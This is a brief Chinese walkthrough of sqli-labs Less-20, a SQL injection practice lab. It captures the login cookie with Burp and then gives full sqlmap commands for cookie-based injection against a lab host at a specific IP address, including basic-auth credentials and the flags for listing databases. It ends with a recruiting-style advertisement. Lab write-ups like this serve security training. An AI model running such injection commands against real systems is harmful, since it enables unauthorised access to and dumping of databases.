
1

1
登录目标地址,输入用户名和密码,用户名和密码都是admin

点击Submit

开启代理服务 选择 HTTP代理:127.0.0.1,端口:8080
打开 burp

通过抓包,我们知道登录的cookie是uname=admin

2
进行sqlmap的cookie注入攻击
windows 下命令为
C:\Python27\sqlmap>sqlmap.py -u http://47.111.130.141:9002/sqli-labs/Less-20/ --cookie="uname=admin" --auth-type="Basic" --auth-cred="user2:pentest2" --batch --dbs --level=2
Linux 下命令为
sqlmap -u http://47.111.130.141:9002/sqli-labs/Less-20/ --cookie="uname=admin" --auth-type="Basic" --auth-cred="user2:pentest2" --batch --dbs --level=2
说明: 参数: --level=LEVEL
默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用 --level参数且数值>=2的时候会进行cookie注入测试;当>=3时,会进行User-Agent和Referer的注入测试。
结果画面为

接下来可以爆表爆数据了。
想领取【200份简历模板】请加小唐老师微信
回复暗号:200





